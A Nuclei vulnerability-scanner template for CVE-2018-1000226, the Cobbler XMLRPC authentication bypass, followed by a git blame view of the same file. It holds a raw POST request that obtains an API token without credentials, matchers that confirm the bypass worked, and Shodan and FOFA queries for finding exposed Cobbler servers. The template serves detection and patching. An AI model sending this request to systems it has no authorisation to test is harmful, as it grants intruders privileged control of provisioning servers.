nuclei-templates/http/cves/2018/CVE-2018-1000226.yaml

id: CVE-2018-1000226

info:
  name: Cobbler - Authentication Bypass
  author: c-sh0
  severity: critical
  description: Cobbler versions 2.6.11+, but code inspection suggests at least 2.0.0+ and possibly even older versions, may be vulnerable to an authentication bypass vulnerability in XMLRPC API (/cobbler_api) that can result in privilege escalation, data manipulation or exfiltration, and LDAP credential harvesting. This attack appear to be exploitable via "network connectivity". Taking advantage of improper validation of security tokens in API endpoints. Please note this is a different issue than CVE-2018-10931.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the authentication bypass vulnerability in Cobbler.
  reference:
    - https://github.com/cobbler/cobbler/issues/1916
    - https://movermeyer.com/2018-08-02-privilege-escalation-exploits-in-cobblers-api/
    - https://nvd.nist.gov/vuln/detail/CVE-2018-1000226
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-1000226
    cwe-id: CWE-732
    epss-score: 0.01309
    epss-percentile: 0.85899
    cpe: cpe:2.3:a:cobblerd:cobbler:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: cobblerd
    product: cobbler
    shodan-query: http.title:"cobbler web interface"
    fofa-query: title="cobbler web interface"
    google-query: intitle:"cobbler web interface"
  tags: cve2018,cve,cobbler,auth-bypass,cobblerd

http:
  - raw:
      - |
        POST {{BaseURL}}/cobbler_api HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/xml

        <?xml version='1.0'?>
        <methodCall>
          <methodName>_CobblerXMLRPCInterface__make_token</methodName>
          <params>
            <param>
              <value>
                <string>cobbler</string>
              </value>
            </param>
          </params>
        </methodCall>

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "!contains(tolower(body), '<name>faultCode</name>')"

      - type: word
        part: header
        words:
          - "Content-Type: text/xml"

      - type: word
        part: body
        words:
          - "<methodResponse>"

      - type: regex
        part: body
        regex:
          - "(.*[a-zA-Z0-9].+==)</string></value>"

      - type: status
        status:
          - 200
# digest: 4a0a004730450220609deac75fd737e3a2aa1b519296137b11cc191a9d5547b71acb4e8306dd4d73022100d47122768361558b11c3f427fb14b94d25b8186bdd1d3861421e95da2b1b8308:922c64590222798bb761d5b6d8e72950
Added Cobbler provisioning server Templates (#3698) Co-Authored-By: csh <25989137+c-sh0@users.noreply.github.com> Co-authored-by: csh <25989137+c-sh0@users.noreply.github.com> 2022-02-14 17:20:32 +00:00			`id: CVE-2018-1000226`

			`info:`
Dashboard Content Enhancements (#4381) Dashboard Content Enhancements 2022-05-13 20:26:43 +00:00			`name: Cobbler - Authentication Bypass`
Added Cobbler provisioning server Templates (#3698) Co-Authored-By: csh <25989137+c-sh0@users.noreply.github.com> Co-authored-by: csh <25989137+c-sh0@users.noreply.github.com> 2022-02-14 17:20:32 +00:00			`author: c-sh0`
			`severity: critical`
Dashboard Content Enhancements (#4381) Dashboard Content Enhancements 2022-05-13 20:26:43 +00:00			description: Cobbler versions 2.6.11+, but code inspection suggests at least 2.0.0+ and possibly even older versions, may be vulnerable to an authentication bypass vulnerability in XMLRPC API (/cobbler_api) that can result in privilege escalation, data manipulation or exfiltration, and LDAP credential harvesting. This attack appear to be exploitable via "network connectivity". Taking advantage of improper validation of security tokens in API endpoints. Please note this is a different issue than CVE-2018-10931.
updated 2018 CVEs 2023-09-06 12:57:14 +00:00			`remediation: \|`
			`Apply the latest security patches or updates provided by the vendor to fix the authentication bypass vulnerability in Cobbler.`
Added Cobbler provisioning server Templates (#3698) Co-Authored-By: csh <25989137+c-sh0@users.noreply.github.com> Co-authored-by: csh <25989137+c-sh0@users.noreply.github.com> 2022-02-14 17:20:32 +00:00			`reference:`
			`- https://github.com/cobbler/cobbler/issues/1916`
			`- https://movermeyer.com/2018-08-02-privilege-escalation-exploits-in-cobblers-api/`
			`- https://nvd.nist.gov/vuln/detail/CVE-2018-1000226`
TemplateMan Update [Sat Mar 23 09:28:19 UTC 2024] :robot: 2024-03-23 09:28:19 +00:00			`- https://github.com/ARPSyndicate/kenzer-templates`
Added Cobbler provisioning server Templates (#3698) Co-Authored-By: csh <25989137+c-sh0@users.noreply.github.com> Co-authored-by: csh <25989137+c-sh0@users.noreply.github.com> 2022-02-14 17:20:32 +00:00			`classification:`
			`cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`cvss-score: 9.8`
Added Cobbler provisioning server Templates (#3698) Co-Authored-By: csh <25989137+c-sh0@users.noreply.github.com> Co-authored-by: csh <25989137+c-sh0@users.noreply.github.com> 2022-02-14 17:20:32 +00:00			`cve-id: CVE-2018-1000226`
			`cwe-id: CWE-732`
TemplateMan Update [Sun Jan 14 13:49:26 UTC 2024] :robot: 2024-01-14 13:49:27 +00:00			`epss-score: 0.01309`
TemplateMan Update [Fri Jun 7 10:04:28 UTC 2024] :robot: 2024-06-07 10:04:29 +00:00			`epss-percentile: 0.85899`
updated 2018 CVEs 2023-09-06 12:57:14 +00:00			`cpe: cpe:2.3:a:cobblerd:cobbler::::::::`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`metadata:`
			`max-request: 1`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`vendor: cobblerd`
			`product: cobbler`
product/queries updated 2024-05-31 19:23:20 +00:00			`shodan-query: http.title:"cobbler web interface"`
			`fofa-query: title="cobbler web interface"`
			`google-query: intitle:"cobbler web interface"`
auto tagging via templateman 2024-01-14 09:21:50 +00:00			`tags: cve2018,cve,cobbler,auth-bypass,cobblerd`
Added Cobbler provisioning server Templates (#3698) Co-Authored-By: csh <25989137+c-sh0@users.noreply.github.com> Co-authored-by: csh <25989137+c-sh0@users.noreply.github.com> 2022-02-14 17:20:32 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Added Cobbler provisioning server Templates (#3698) Co-Authored-By: csh <25989137+c-sh0@users.noreply.github.com> Co-authored-by: csh <25989137+c-sh0@users.noreply.github.com> 2022-02-14 17:20:32 +00:00			`- raw:`
			`- \|`
			`POST {{BaseURL}}/cobbler_api HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: text/xml`

			`<?xml version='1.0'?>`
			`<methodCall>`
			`<methodName>_CobblerXMLRPCInterface__make_token</methodName>`
			`<params>`
			`<param>`
			`<value>`
			`<string>cobbler</string>`
			`</value>`
			`</param>`
			`</params>`
			`</methodCall>`

			`matchers-condition: and`
			`matchers:`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`- type: dsl`
			`dsl:`
			`- "!contains(tolower(body), '<name>faultCode</name>')"`
Added Cobbler provisioning server Templates (#3698) Co-Authored-By: csh <25989137+c-sh0@users.noreply.github.com> Co-authored-by: csh <25989137+c-sh0@users.noreply.github.com> 2022-02-14 17:20:32 +00:00
			`- type: word`
			`part: header`
			`words:`
			`- "Content-Type: text/xml"`

			`- type: word`
			`part: body`
			`words:`
			`- "<methodResponse>"`

			`- type: regex`
			`part: body`
			`regex:`
			`- "(.*[a-zA-Z0-9].+==)</string></value>"`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00
			`- type: status`
			`status:`
			`- 200`
Auto Template Signing [Sat Jun 8 16:02:16 UTC 2024] :robot: 2024-06-08 16:02:17 +00:00			`# digest: 4a0a004730450220609deac75fd737e3a2aa1b519296137b11cc191a9d5547b71acb4e8306dd4d73022100d47122768361558b11c3f427fb14b94d25b8186bdd1d3861421e95da2b1b8308:922c64590222798bb761d5b6d8e72950`